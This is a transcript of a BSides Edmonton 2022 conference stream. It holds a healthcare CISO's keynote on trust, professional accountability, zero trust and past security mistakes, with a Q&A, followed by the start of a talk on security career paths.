BSides Edmonton 2022 Cyber Security Conference

BSides Edmonton · 2022 · 9:35:01 · 23 views · Published 2022-12 · Watch on YouTube

Tags: Category: Community; Style: Talk
About this talk
Organized by (ISC)² Alberta Chapter, BSides Edmonton 2022 is an annual cyber security conference in the City of Edmonton. It is a two-day high-calibre conference focused on all aspects of cyber security. You will get 16 CPE points for attending the conference. Security BSides is a community-driven cyber security conference by cybersecurity community members. The goal is to expand the spectrum of conversation beyond the traditional confines of space and time. It creates opportunities for individuals to both present and participate in an intimate atmosphere that encourages collaboration. It is an intense event with discussions, demos, and interaction from participants. It is where conversations for the next big thing are happening. BSides events combine security expertise from a variety of platforms in search of the "next big thing" in information security. BSides is an open platform that gives security experts and industry professionals the opportunity to share ideas, insights, and develop longstanding relationships with others in the community. It is a rare opportunity to directly connect and create trusted relationships with key members of the Edmonton community.
Transcript [en]

...other events is going to be hosted by SentinelOne. It's a threat ops challenge, so it's just using their tool to kind of find threats in an environment. And that is it, so I'll wrap things up and hand it back to Thomas.

You mentioned something about asking you to get a Wi-Fi password. I'm pretty sure there's lots of people here who already have the Wi-Fi password, or have a means to get the Wi-Fi password, if you know what I mean. All right, so, I don't know where he went. Where did Robert go? He was sitting right there. We're going to introduce our keynote speaker.

So Robert Martin is the Chief Information Security Officer of Alberta Health Services, and as the CISO Robert is responsible for all aspects of the information and cyber security program for AHS, the largest health care delivery organization in Canada. AHS provides health care to the entire province of Alberta and is fueled by over 120,000 staff, physicians and volunteers. He is the co-chair of the AHS Enterprise Risk Management Executive Committee and leads the security operations, policy, governance, compliance, architecture, awareness, service manage... is there anything you don't do? ...service management teams, with a focus on identifying and managing risk. Previously, Robert was a trusted advisor and consultant in information security and risk management for large public and private sector clients in retail, health care, energy and government.

So with his talk entitled Trust, Stupidity and You, please welcome to the BSides stage Robert Martin. [Applause]

I've got to figure out how to put the microphone in the thing. Okay. Good morning everyone, thank you Thomas. Before I get too carried away, I just want to say that I'd really like to say thanks to Harvinder and Thomas and the entire organizing group for this. Thomas and I were talking about the wonderful type of community we have in Edmonton here, and you really see this when everybody's coming together and shaking hands and hugging each other. I know many, many of you, and I have a very supportive crowd in the front couple of rows, right? No heckling from the team. But anyway, so thank you very much to the organizing committee. It's very nice to be back here. I'm wondering if I'm getting a bit too much of an echo. Is it bad or good? Okay, just tell me if it gets worse.

I think we have the hardest job in the world. I think we have probably, at this point in time, the most important job in the world, and I don't think that it just has to be the people that are doing the security operations center or the red team. If you're working on a privacy impact assessment or a threat and risk assessment, you're doing security awareness, you're doing any of those things that Thomas said that I have under my team, or some of the things that we don't have under my team, it's really important to understand how much impact we have on the world. If we don't do our job, or if we do our job poorly, there's massive impacts, and I want to relate the massive impacts and the reason that I wanted to talk about trust, because I think trust is the most important commodity that we can deal with as security professionals. If we do things to lose trust or to erode trust, then all of the things that we've been trying to do as a society for the last 25 years to empower people to operate digitally just go away.

So like Thomas said, the themes I'm going to talk about are trust, stupidity and you, and I don't want you to form a sentence out of that. "I don't trust that you're stupid," there's nothing like that. But really what I want to do is give you some reflections on my career over the last 25 or so years, and look at some of the things that I see as we've evolved from an information and cyber security perspective, and really have that focus on the trust.

So back 26 years ago, 1996, a good friend of mine who was still in engineering at the University of Alberta was in the

Eng 400 class. I had graduated three years before him, and he said, you remember that class that you go to? It's everybody that's going to get out of engineering, and back in those days at least it was a bunch of old white men giving you speeches about the importance of professional accountability and trust and dealing with the public. And the dean of the school at the time, Fred Otto, stood in front of the classroom my friend was in and said, if you're working with computers, whatever working with computers means in 1996, you'll never be a professional engineer in the province of Alberta. And half the electrical engineering students stood up and walked away, and all of the computer engineering class stood up and walked away.

When my friend told me this later that evening, I was insulted. I was three years from university, I was one year from getting my professional engineering designation, and of course my stuff is important, and you know, why would he say something like that? This guy obviously doesn't understand. But when I went through the process of thinking about the difference in the opinion between somebody like Dr. Otto and what he perceived us doing with computers, there wasn't that connection there, there wasn't that impact.

Let's give a traditional engineering example. You build a bridge. Rush hour traffic, there's 50 cars on there. Let's pretend that it's two people per car, even though we know in Edmonton it's only going to be one person per car, but it's 100 people on this bridge. The bridge collapses, falls into the river, a bunch of people die. Absolutely tragic situation. There's a huge impact to the people, to the families that are impacted. The city's disrupted because there's no bridge. The city has to spend a couple hundred million dollars to build a new bridge; it's going to take many, many years. And somebody like Fred Otto would look at this and go, that is why you have engineers, because if you screw up, that's the kind of impact that you have. So park that for a second.

A couple of years later there was a big push by CIPS. Some of us would remember CIPS, the Canadian Information Processing Society, maybe? Anybody? Oh, there we go, at least two, three people know CIPS. Back up until probably 2005, CIPS was the thing when it comes to IT across Canada. There were a couple thousand members in the CIPS Edmonton chapter alone, and they did a lot of work to get an information security professional designation, where they were trying to have the same argument that the engineers or the accountants would have with regards to public impact: you make a mistake, you do something wrong from an IT perspective, and there's big consequences. A good friend of mine was leading the initiative in Alberta, and he asked me to sign up and get that designation, but I was still struggling to figure out how I was going to be a professional engineer, and I didn't want to go down the path of this other designation, because again, I couldn't understand the issue of impact. Was the thing that I was doing actually going to have the same impact?

So with those two as sort of background information, fast forward to 2017. Fast forward to the Russian invasion, cyber invasion and attack on Ukraine. If you haven't read the book Sandworm by Andy Greenberg, I highly suggest that you buy that and read it. I highly suggest that you

give that book to people that you're trying to communicate with about cyber security issues. If you know anybody like that, that writes for Wired or at The Atlantic or whatever, they can take these complex things and put them in a context that makes it interesting and readable. So I took this book, I read it last fall, and then bought a dozen copies and gave it to executives in our firm and peers, and asked them to read this to understand the impact that happens if we don't do our job correctly.

So come full circle from 1996 to 2017, and I think it's obvious now that the things that we do have great impact on the organization, have a great impact on society. I think it's important to understand that if we don't do our jobs, or if we don't do our jobs well, we're going to get into a situation where we're going to be impacting people, potentially like the bridge example, right? Maybe the bridge doesn't collapse if we don't do our job, but maybe multiple people lose their personal information. Maybe an organization has a major breach and loss of shareholder value. I know it's not exactly cyber security, but what happened two weeks ago with Twitter and the new verified blue check mark process and Eli Lilly, right? Somebody creates an account, they're verified as Eli Lilly, they post a tweet to say that insulin is now free, and Eli Lilly's stock price tanked, right? And it's not a hard stretch from what we do from a compliance perspective, from a controls perspective, to something like that, and understanding that, you know, the mistakes that we make could have that same sort of consequence.

There's a lot of other issues, of course. Breaches are something that come to mind. A few of us were involved in a breach about nine years ago where we didn't actually know for sure if the people's information was compromised, but we took due caution and we alerted 11,500 people of the issue. By today's standards, 11,000 people is nothing, right? From a breach perspective there's always in the hundreds of thousands of people that are now compromised. But I think it's really important for us to understand that 11,000 people received a letter, and 11,000 people went, what does this mean to me? Right? Even if it wasn't a mistake that we made, even if we didn't know for sure that there was that breach, we took that initiative to make sure that people understood that, and in effect, trying to do the right thing, we still caused those people grief.

So what happens now if it's a hundred thousand people? What happens if it's everybody in the province of Alberta? What happens if it's like what happened in Newfoundland just over a year ago? And, well, I mean, officially we still don't know what happened with their health system in Newfoundland, but the rumored price tag for the recovery from their outage in the health system in Newfoundland is around 40 million dollars, right? So if we don't do our job correctly, not only are we potentially breaching people's health information, but we're actually causing a great deal of cost and impact to the organizations that we're working for.

So I guess the point really is, if you want to be able to communicate what you do, if you want to be able to understand the impact that you have, I think it's important for us to be able to communicate the potential impact. I'm going to get back to this in a little bit when we start talking about some of the quote unquote stupid things that have happened over the years in my career, and I want to make sure that people understand that I'm not pointing fingers at anybody in this crowd; I'm actually pointing fingers towards me when I talk about being stupid. But in the last 25 years we've decided to move towards online services, we decided to move towards, you know, digital personas and digital activities, and the underpinning of all that is the trust that builds from

security. So please don't lose sight of that. That's a little bit about trust; we're going to come back to that in a few minutes.

I want to talk about stupidity now, and there's a lot of people here from a security perspective. I would imagine that some of us are thinking about stupidity, and then the first thing they think of starts with the U: users, right? I mean, how many times have you said in your career, at least I've said in my career, that my job would be a whole lot easier if I didn't have to deal with users, right? You can say there's a bunch of problems with users. Users click the link, right? Well, the user, maybe there's a problem with a system or a problem with regards to a lack of knowledge, and the individual does something that we would think is stupid.

There's a great cartoon, you've probably seen it. It's the boxing ring and the microphone's hanging down from the ceiling, and in the middle of the boxing ring is the referee, and he's holding the microphone in his hand, and he says: in this corner we have multi-factor authentication and encryption and firewalls and anti-malware software, and in this corner we have Dave. Our Dave. And if your name is Dave, I apologize, I'm not picking on Daves. I'm not picking on anybody, because really Dave is just the average user, right? Dave clicks on the link in his personal email and it encrypts his work computer, that then encrypts the file share and causes a bunch of grief on a system. You know, maybe Dave didn't understand what Dave was doing. Maybe Dave's just trying to get his job done and builds a server, sticks it under his desk, and doesn't understand that he needs to patch that system. Maybe Dave is responsible for some workflow and is thwarted by security or thwarted by IT, and says, you know what, I'm just going to go sign up for 100 bucks a month on my credit card and buy some cloud-based service online, because I just need to get my job done.

And we can shake our heads and roll our eyes, and we can say, you know, how many times do we have to tell Dave that you can't just do this? You gotta not click the link, you gotta not have the server under your desk at work, you can't just go off and buy some cloud service. The problem with it is that they're just trying to do their job. Like, what's Dave's job? Maybe Dave pays vendors, cuts checks for vendors. Maybe Dave runs a dispatch team to deliver, you know, gravel to your house. Maybe Dave is in customer service. Dave is not in information and cyber security; we are. It's our job to do those things. It's his job to go do whatever it is his job is. And I think it's really important to understand that people are going to do quote unquote stupid things, because people make mistakes, because we all make mistakes.

So I don't want to pick on users anymore. I want to talk about the things that we do that are stupid, and to the point I made earlier, I'm going to talk about some of the things from my career that make me kind of shake my head, and I want us to think about them so that we can

learn from that and maybe change the way we do things going forward.

So the first thing is around the perimeter. For those of you that know me, for a lot of years I taught many courses, 40 courses in about a five-year period, largely focused on information and cyber security principles. There's probably a couple of my former clients in this room as well, where I had a lot of time back in the early 2000s trying to get people to understand how they could use the internet for their business. And I had this diagram, this Visio diagram, with this wonderful little brick wall in isometric form, and you know that was the firewall. And I had a little dotted line that I would draw through the firewall, and on the left-hand side of the diagram there'd be this ethernet network and a couple computers, and I'd write "trusted," and on the right-hand side of this dotted line in the firewall there'd be a big bulbous cloud to represent the internet, and I would say "untrusted."

And in 1998, when I first did a diagram like that, or even 2003 or four when I'm teaching those courses, I think it's okay to be talking about a trusted and untrusted network. But if you really think back on that, think of the damage that that does, thinking about the fact that we can actually build an entire network that we trust, right? That means there's no computers on your network that you don't manage. There's no computers that have been compromised on your network. There's no insiders that are doing something against you on your network. And so it's problematic to think that we actually would have ever created a trusted network. But as a consultant, as an instructor, even as a manager, I was trying to communicate a very complex and complicated topic, and I was trying to get a way for people to understand that it's important to have this firewall. But the problem is that over the years, when you sell that story, people then go, oh, Robert's here, he's going to put in a firewall to secure us. We all know, especially now, that there is no such thing as a firewall that's going to secure us. It is one of those things that we need, but it is absolutely not the only thing that we need.

And I think the insidious thing here, the thing that's really been problematic over the years, is that it took a long time for people to understand that we're going to need to buy more controls. The first time I went forward and said, well, now we need to go do this, people said, well, you told me I needed a firewall, I thought that was going to be all I needed to do, right? So we dumbed down the conversation. We got it to the point where we could communicate a very complex and complicated topic into a single icon in isometric form on a Visio diagram, and people thought that was quote unquote all you have to do. It took a long time to get over that, and it was really not until John Kindervag from Forrester came out with the whole concept of zero trust that people now have to understand that it's not that you have a single device or single control that's going to take care of this for you. You actually have to understand that there's nothing on there that you should implicitly trust.

So that's the first thing from my career that I think should cause us to reflect back on some of the decisions that we've made in the past.

The second one I want to go into is the Dave cartoon again, right? He listed all these controls, the referee did. He talked about encryption and multi-factor authentication and anti-malware. He basically talked about defense in depth, and I think defense in depth is something that we should not talk about anymore. It was one of those concepts where there were some of us that were looking at every layer of the OSI protocol stack and thinking we needed a control at each one of those points. We needed to have a control at every single intersection point on our architecture diagrams. And what's the purpose of those controls? The purpose is that we need to understand how to protect things.

My second day at one job, I had a physician come up to me, and he pointed his finger in my chest and says, the problem is, if you do your job, I can't do my job. And I think, maybe somewhat to my credit, I replied very quickly. I said, no, if I do my job correctly, you don't know I exist. And I think that's what we need to do. We need to not say that defense in depth is what we need to do, and not need to say, here's all the controls that we need to have, I need to have an overload of controls and have a different firewall on the outside than on the inside and a different malware on our servers than on our desktops, because that just causes burden. That just causes people to slow down their work. It just causes people to bypass us and go around. And I'm not saying that we need to get rid of controls, although that might very well be the case. I think we need to be smarter about the controls that we have. And I think defense in depth is one of those things where 15, 20 years ago, when we're coming into this industry and trying to figure out how to communicate this, we tried to find a topic that made sense to people: well, we need to have coverage of the controls. And I think we need to be much more judicious in our control selection now, and much more focused on the actual implementation of controls that will do what we need to do.

The last example that I'll give is around a situation about the same time as the dean of engineering made that comment. I was working for a consulting firm. We were trying to build, I was trying to build, a burgeoning internet practice. Management at the company wasn't sure that the internet was

going to be a thing. Is this a flash in the pan, or should we invest in this? And of course I had that sort of like, oh, a bunch of dinosaurs, and you know, blah blah. Looking back at it, though, I can see now that they never saw the value in the internet. Their world was a mainframe behind a glass wall, and data went into the mainframe and reports came out of the mainframe, and the business ran themselves on the reports that came out of the mainframe. There was a direct connection between the business and the mainframe, and therefore the mainframe had value, and as a consulting firm, if we support the thing that provides the business value, we can make money.

The first job that I did on our burgeoning internet practice was to essentially take, well, it was probably WordPerfect 5.1 in those days, probably wasn't Word, a document that the Department of Environment had made, and publish it on the internet on a bunch of static web pages. And management looked at me and said, you know, is that a business model that is actually going to make sense? Is somebody going to pay, I mean in 1996 or whatever it was, 75 bucks an hour for a consultant to copy HTML pages onto a website? There's no value in that.

But about that same time our Victoria office called and said, yeah, I think we might have something that gives us some value. So management sent me to Victoria for a couple of days, and I remember sitting in the boardroom in Victoria, and there was just this screen. Imagine what a web browser looked like in 1996: there's an input field and a submit button. And on another monitor they show us this database, and there's a bunch of dummy data in some Oracle database, and the guy types into the input field, types in a date range, hits submit, and a second later all this data wonderfully appears on the screen. So I take over the keyboard and I type in a couple of different date ranges, and I can see that this is an actual live connection to the database. Change the database, rerun the query, and this is wonderful. And instantly I looked at this and went, this is fantastic. You know, this is how we're going to have value. This is a connection between all of our data and the internet. This is not just static HTML pages.

Now, reflecting back on what we did in that boardroom in 1996: we basically invented SQL injection attacks, right? We basically had the ability for us to put code directly into a query against a database. And I think we can probably give ourselves a pass, again, to say we didn't really think of the problems of creating SQL injection back at that point in time. But I think it's important for us to reflect now and think about the things that we are doing today that could be tomorrow's SQL injection. What are the things that we're doing that are stupid, that we haven't put in place, or have put in place but don't manage properly, that could be causing problems? What are the things that we do where it's like, I can't believe we haven't rolled out some control to whatever system? Maybe there's no multi-factor authentication. Maybe we still have a critical system on a server underneath somebody's desk. You know, why haven't we dealt with that? What are the things that we know about that we should be fixing, that we should be raising up for attention and getting changed? But also, what are the things that are new technologies that we're enamored with that could be causing us problems? What is the next connecting-a-web-browser-to-a-SQL-database going to be? Is it something on the cloud? Is it something with regards to the fact that we all have smart devices, our phones and apps, and the ability to carry around large amounts of data? What is the thing that we're doing right now that you're going to turn back on in the future and go, I can't believe we did that, right?

Users will always click the link. Users will always do the thing to do their job. We have to anticipate that; that's part of our jobs. If we're not anticipating those things, we're not doing our jobs. But the point is, there's a bunch of things that we do that need to be challenged, and this isn't easy. I mean, I look at this with my team and my own personal experience, and I go, what is this? And, you know, what is the thing that we're missing, and how do we get time to do those things and the money to fix those things? And I really think that one of the lessons that I want to impart is that we

need to explain to people how complex and complicated these things are that we're doing. And if you think back to the firewall with the trusted and untrusted, right, trying to dumb things down to make a complex and complicated thing simple, or if you think about just even the wording around some of the ways that we've deployed controls, and allowing people to think that, well, Robert's going to install a firewall and we'll be secure, allowing that sort of language to happen is actually detrimental to us.

And I think I'm going to go back to the plug. If you haven't already gone and got the Sandworm book and haven't given it to all of the people that you work for that don't understand what you do, go to Audreys, buy that from your local bookstore. Thank you very much. I think it's a really good opportunity for you to find a way to communicate a very complex, a very dangerous and impactful thing to people. Because if we can do that, if we can say, without using fear, uncertainty and doubt, that here's a problem, and actually show that there are consequences for the decisions that we're making or the decisions that we're not making, and show the real-world impacts of that, we can then help build the trust around our systems, we can help maintain the trust around our systems. We're not trying to say the sky is falling. We're not trying to say that everything is wonderful. We're actually going to communicate that there are major problems here, there's major investment required, and it's not just, you know, Robert's firewall that's going to solve the problem. It's a multi-disciplinary team, it's a multi-disciplinary skill set that's required. And that's why I said at the start, it's not just about the people in the operations center, it's not just the red team people that I'm talking about here, it's everybody that's involved in information and cyber security.

So I want to challenge you to think about what it is you need to do, what it is you can do better in your world, what it is that you're maybe potentially embarrassed about now that you're doing or not doing, what is it that in a few years you'll be embarrassed that, oh man, I can't believe we actually did that thing, and work to find a way to address those issues, work to find a way to make those things better. Because I think the bridge example is important. The bridge has a very impactful issue if it falls down and people die as a result. There's obviously societal impacts, there's issues with regards to the families, there's the capital cost. But what we're talking about here isn't just a single bridge. It could be talking about all the bridges in Alberta. It could be about the fact that the bridge is going to collapse because of somebody from outside of Alberta. And if you really want to circle back to that 1996 conversation with the dean of engineering, hopefully we can now explain to those people, the old people, that there actually is impact to what we do, and that we actually do have to think about things in a much more comprehensive sense.

I have no idea what time it is. All right, how much time do I talk, Thomas? Five minutes? So that's good. There's no clock here and my phone's in my pocket. I would like to give the time for some questions or some comments. No heckling from the team, please. But if anybody has anything to ask, I would be happy to do that, and otherwise I'm going to be around for the morning, and so if there's questions or people want to talk without having to be in this sort of forum, I'd be happy to do so as well. But anyways, thank you very much. Reflect on the importance of your job, whatever your job happens to be in information and cyber security. Think about the trust, and the impact of your job on the trust that people have in our systems and our institutions, and then think about all the stupid things that I've done, and don't be like me. Thank you very much. [Applause]

Thank you, Robert. Are there any questions? If so, please just raise your hand and I'll come walk over with a mic. Any questions for Robert? How's your solitaire game going?

Very good, thanks.

For those who don't know, can I tell this story? So Robert is a live-streamer solitaire player.

Yeah, I tried to learn how to do things on Twitch, and so the only thing I could figure out that I could play, that I could do, would be solitaire, because I have no high Twitch reflexes, so

it was actually very entertaining questions yeah over here perfect you can just stand up please sort of

see if I get feedback no feedback all right uh okay so Engineers love rules cyber security people love breaking rules how do you strike a balance between the two yeah I mean I think there's uh um there's a bunch of people in information and cyber security roles that love rules and compliance and uh making sure that the things that are done follow policies and procedures and standards so I would think that there's a number of people on my team uh and in related teams that are rule followers versus a bunch of people on my team that are rule Breakers because they're trying to find the ways of making the system uh fail so that we can secure it whereas

the other parts of my team are like here's how you have to do things so that things don't fail uh and I think you're probably never going to have an individual that plays both roles but I think you have to have a team that you have both roles on it right because I think it's really important to understand that um those people need to work together really well because uh we're all doing the same thing we're just doing it from a different perspective thanks for the question that was great anybody else any other questions one more oh yeah we got one right here Robert

good morning can you hear me okay just a quick question if you had any uh Lessons Learned or lessons observed about the Newfoundland Health Care attack maybe specifically about inability to act on um red flags I know they had a 2015 2017 and then 2019 external audits that raised multiple issues none of the issues were fixed and suddenly they had suspected ransomware yeah I mean I I would say that Newfoundland um boy this is a tough question to answer uh Newfoundland uh from their own admission doesn't seem like they knew how to respond to those Audits and it's not that they were uh purposely not doing anything it was just they were paralyzed in doing

something; they didn't know where to start. And I would say that they learned the hard way about having to start sooner, right? What I do know from my conversations with some of the people from Newfoundland, and with the federal government, for the amount of information that the feds can release, is that the red flags were there and they needed to be acted upon, absolutely, to your point. I think it was just one of those problems that was just too big to comprehend, and they just didn't know where to start. And I think Newfoundland's done a great job of saying, let's not have this happen again.

How do we build the infrastructure and the support processes so that it doesn't happen again? Not that we haven't had breaches; I mean, I talked about one of them. As I like to say, I know we have a good incident response process because we use it so often. But I think in Alberta, what we've been able to do that they weren't able to do in Newfoundland is have the critical mass to actually tackle the problems in parallel instead of serial. I think because they were so small, they weren't able to say, well, let's do some policy work and some compliance work and

some, you know, infrastructure work and some technical controls, and I think they just couldn't get going. And so I think that's... I'm not sure if that answers the question, but I think that's what I can say. Thanks.

One of the things that I always try to define our role as is identifying risk to the organization, just like you said. So a good way to add on or complement what you said is to turn that lens on ourselves as a risk to the organizations that we are trying to protect, and really, like, what are we doing, and why? Yeah, that's really great. I mean, I wish I would have talked to you before I gave my speech, because it would have been a great add. So thank you. I think that's exactly what I was trying to say, right? The

it's not just the user that causes the problems in our environment; it's our own action, our inaction, sometimes it's our own inability to get things done, it's our own desire to chase the shiny, right, or the new, that potentially causes some problems for us. So absolutely, I think that self-reflection, if you want to call it that, and turning that risk view on ourselves to see what we're doing wrong, is absolutely what I would suggest we all do. Absolutely, yeah, thanks. This guy over here has got a question. Not him. No. Good morning, Robert. Definitely a very good talk, very

thought-provoking, in terms of trust, stupidity and use. So on the zero trust side of things, you mentioned John Kindervag and the philosophy of zero trust. So in your opinion, is zero trust, you know, trust but verify? How do you build that philosophy in an organization, or even from an infrastructure perspective or a process perspective, so that we ingrain it in the psyche of people, or even the industry, and move that needle forward in terms of, you know, I'll trust you but I'll verify, you know, what your identity is or whatnot, right? Yeah, so great question. So I think

there's two things I would say. So first of all, once somebody or some business area goes through an issue, a breach, they're much more receptive to understanding the trust-but-verify. So you have to be very opportunistic when there's a problem, even if it's a small problem, you know, start having the conversation about, well, this is why we do these things, this is why we have these controls, this is why I said we needed this thing that you said we don't have the money for. I think that's the first thing: never let a good crisis go to waste. The second thing I would say, though, is in an organization, especially in healthcare, to say that we don't trust

our people is a very dangerous conversation and a very problematic conversation to be having with the various groups, and not even talking about the unions, I'm just talking about human resources. And so I think it's more important to focus on the devices, right? Yeah, sure, you know, Dave's a great person, but Dave's device, do we trust Dave's device to be on our network? Well, no, no, no. Well, of course, let's discuss, have that conversation. I think that's the way that we're getting some success. If we talk about zero trust at work, people go, oh, well, you know, what does that mean? And you talk to the vendors, and all the vendors have a

different implementation of what zero trust means. But if you go and say, let's make sure that we know what's on our network, we're finding that nobody's really arguing about that. You know, that whole concept of the fact that it's not a trusted network and that we're allowing people on our network, people then are fairly quick to make the jump to the fact that we need to make sure that those devices aren't causing us problems. And so we don't say zero trust, because it's a very emotional phrase, if you will, but we talk about the fact that we have to know what's on our network. And if we can have that

conversation, if we can start getting into, you know, certificates for all of our devices and partitioning off to different networks for the non-AHS devices, then we're building zero trust without having to say the words, right? But, and maybe it's different in your industry, but to say to the executives that you don't trust your people is a great way to get ignored. Absolutely. Awesome. Any other questions? We do have time for one more. Oh yeah. Oh, Adam again. Oh no, it's the two-for-one special. Lots of industries have gone through various stages of legislation for safety and security; OHS, industrial safety is an example.

Where do you see us over the next decade going, from the beginning of some of the mandatory rules to a much more strict, structured, maybe legislation, mandatory policies you have to do? Before, we would have said, oh well, I have multi-factor, except for half of my users, but I can check it off; to: I have to do it or our company can't operate legally. There's two things I would say. So first of all, you can typically take a look at what happens in the States and then add 15 years onto that and say that's probably going to happen in Canada, where, for that sort of industry-imposed regulation, the Americans do a much

better job with that than we do in Canada, which is funny, seeing how disjointed their privacy legislation is, right? But their legislation, or the regulation around device security or health information, tying that to economics and getting paid, is a very effective model. I was at a Canada Health Infoway conference, and one of the conversations we had was with the Office of the National Coordinator for Health and Human Services, talking about that exact issue: how do you get that level of regulation that they have in the States up here in Canada to actually define things? I don't think we're going to see comprehensive legislation to do that

across Canada, but in the Infoway meeting last week we're starting to talk about what are the minimum requirements, you know, how do you enforce the ISO standards and the cyber security framework, how do you build those controls into an agreement so that people actually are forced to comply with these things, so there's a level of trust. I really wish we could have that sort of national regulation here. I don't foresee it happening, at least not in the next several years, but like I said, in a lot of these cases, if you follow what the Americans do, 15 years

later we sort of do that in Canada. And I think there's some opportunity and some conversations happening right now. And honestly, back to the Newfoundland thing, Newfoundland is driving a lot of that, because there is a certain amount of interconnectivity and interdependence on those things. What happened in Newfoundland impacted Prince Edward Island and Nova Scotia, New Brunswick, because of patient maneuvering, and so maybe there's a reliance or a requirement to have those extra regulations. But again, it's going to be a while before we get that, unfortunately. Awesome, thank you, Robert. Great questions. Another round of applause, please. [Applause] Are you all here all day, Robert, for

people to chat with you? Are you here all day? Yeah. So please feel free to connect with Robert. We're right on time, so we might as well just head right into the next talk. So our next speaker is Dr. Vincent Chu. Dr. Chu is a founder and past president of (ISC)² Alberta. His company, Access Cognisolve, is an (ISC)² official training provider, and Vincent is an (ISC)² official trainer. He enjoys empowering students, new immigrants, career changers, career advancement, and those who are interested in fast-tracking their security careers by providing boot camps, courses, workshops, and sharing career advice and presentations. So with his talk entitled "The Right Security Career for Me Is Dot

Dot Dot," please welcome to the BSides stage Dr. Vincent Chu. [Applause] So I'm hoping you guys can hear me. So this presentation is very passionate to me, very personal. The reason I want to give this topic is because I have had a lot of requests to give talks to students, new immigrants, the last 25 years, okay, and people who want to change careers and so on. So I have to tell them some of the reality of it, right? When I teach computer hacking courses, people will think that, wow, this is really great, I'm going to get paid a lot. I say no, you're going to get paid when you write the

report, okay, not for all the things that you hacked, okay. And they said, what do you mean I have to write? I say yes, right. Unless there are companies that you go to, or the services industry, where you actually do the work and somebody else will write it, okay. But in reality, you want to make the big bucks at thirty thousand dollars an engagement? Yes, you have to write that report, right? So I want to let you know, I'm not here to... this is not a get-rich-quick scheme. I would like to know, in general, why do you guys do security? Like, is it because of the money? If you have all the money in the world,

what actually do you want to do? Like, why are you doing this thing? Anybody want to volunteer? Tell me, why are you guys doing this job besides money? Yes. You're different, that's good, I like that, right? Yeah, contribute, giving back and all that stuff. That's what I do it for, to give back to the community. If you look at my career, everything I do is to give back to the public, right? So the last six to eight years I spent time working, I went through all the critical infrastructure sectors and I worked in them so that I truly understand what the need is, how they are interdependent, how they're supposed to be harmonized, right?

So what else? What do you guys want to know? Like, in terms of a security career, what do you guys want? I'll give you some examples, okay. I have a veteran who comes to me: Vincent, I just finished my service, okay, but I still want to give back to the community, right? I'm ex-military, I do C4, whatever, what can I do? So those are the kind of people that I help, right? And I have new immigrants who come here and say, this is my background, what can I do, right? I have people in philosophy or, you know, psychology, who ask me, what can I do? I say, do you know that the last couple

of companies I went to, all the AI departments or whatever, they're all PhDs in psychology, right? They are not computer scientists. I'm not saying there's no computer science there, they do, but most of them, because you need to... it's not so much just writing a machine learning algorithm, but you need to know, okay, where do you draw the line in terms of ethics, where do you draw the lines in terms of biases, right? So I have to show them, you know, depending on your background, what kind of jobs there are, right? I have a lot of people who are... like, I tell you honestly, there's this law enforcement, on their website they say, you

know, if you're over 50 you can, you know, do apply. But when I see them at the career fair, you tell them you're over 50, they say don't apply, right? So that kind of contradicts their website. Obviously they will not put it in writing, okay. So I like to tell people the reality of what's going on out there. Yeah, so I have a lot of those kind of things. That's what I want to ask you. Like, I have people who are, you know, like new immigrants who come here, and they would like to... you know, they don't have a piece of paper, the Canadian paper, the Canadian experience, so they will take a course, sure,

they can go learn this stuff, and then they learn the technical, so they get... then I ask them, do you really want to configure a firewall, like, every day? And they say, no, Vincent, I don't want to do that, right? So then I have to guide them, maybe, depending on what they want to do, right, whether they want to do business analytics, business analyst, or project manager. There's an opportunity: if you go to most companies, they will have a project manager that specializes in security. Why do I not see anyone talk about that as a career, right? So then I have, like, these days data analytics is a big thing, I have a lot of

students come to me: you know, Vincent, I hear a lot about security, but my major is in business analytics, how do I apply that to security, right? Is there a job for me? I say, yeah, we do analytics all the time, right? I'm sure most of you can tell me, you know, you guys do analyze data, all right? Yes or no? And I just love the giggle, okay. See? So I told him there's a lot of opportunities depending on your background. Like, some people think, like, computer science. How many of you are computer scientists here? Okay, a few of you, it's good. Like, if you look at the history, right, if you look at

the history of things like syntax, grammar, binary trees, they're from the linguists, they are from philosophy, they are not from computer science, right? If you trace it back, we have a lot of cross-discipline here, right? So no one, no specific domain, owns everything, right? We have to work together, okay. And anything else? Like, anything you guys are interested in, in terms of jobs or whatever interests you? Any question at all? Then I just keep telling stories. Then I'll tell you at the end what was mine, you know, what I wanted to be when I grew up, when I grew up, right now, okay. I'll tell you at the end.

So I mean, one of the fun things is, like I said, as a career: how many of you are employees in security, right? Okay. How many of you are contractors? How many of you are consultants? Just different, okay, good. How many of you are business owners, you run a security business? How many of you are partners? How many of you are investors? How many are venture philanthropists? See, there's a lot more, okay. There's a lot of careers that you can do, right? You have to... I'm not going to tell you where to go find them, because that's not my job. I'd rather teach you how to fish; I'm not going to give you the fish, okay,

if you know what I'm talking about. So one really... I like the venture capitalists who want to invest in security technology. So if you work with them, that's really nice, because they've got lots of money, right? Wherever they fly you to, they send a limo for you, and you go there and then you check out all the technology around the place, and then you can decide, well, yeah, only you tell them, you advise them, right? So those kind of jobs are really nice, really good. And some of my friends who tell me, I want to travel, I like to show off stuff, then I say, yeah, you can become

sales, you can become application... I do know there's some challenges, it's not an easy life, you know, to go travel, but there are versions of traveling that are nice too, right? I have people who say, I just like to build stuff. Have you considered working, like, universities need... the University of Alberta, even Calgary, there's lots of opportunities for you to set up labs, right? And you can keep setting up all this environment and there's no harm, right? It's not like you go to work and you set up a lab environment and then you crash and burn, there's consequences, right? But when you do it in the lab, in the education environment, it's very different.

So there's a lot of jobs out there. You have to go look, you have to go find out what you want to do. Another thing I told them is that there's a lot of interpretation jobs out there right now, but they don't have the name "security" inside, right? You've got sort of IT/OT, everyone? No? Yeah, I see something goes up. So that's basically IT security and the other side of security, whatever that is, right? So we need someone to do the translation, okay. I have a lot of people who work out in the field, whether they are instrumentation journeymen, electricians. You would have thought, like... and how many of you were at Fort McMurray,

right? It's very dusty in the summertime or very cold in the wintertime, there's no in between, right? So if you ever... that's what they all want, to come into the office. So I told them, you can take one of those jobs, right? If you want accountability, become a PM. If you want an easy life, come eight to five, become a business analyst. So your title, which side to go, which department to go, the kind of lifestyle you're gonna get. Then they come into the office, and most of them are really enjoying it, okay. And it's you guys on this side, I mean, if you want, you can grab me

later on, we can discuss this. So that's what gives me gratification, right? I came in yesterday, my students filled me up, let's go, they buy me lunch or they buy me supper. That's where I see the win, right? I mean, I cannot save the world, right, but at least I can, you know, encourage one student at a time, right? That's what gave me satisfaction. So that's a lot of opportunity, right? So that translation world is really nice, because especially when you have an expert in another domain, right, doesn't matter whether mathematics, engineering, even science, any science, right, or philosophy, kinesiology and all that, you can actually take that and then

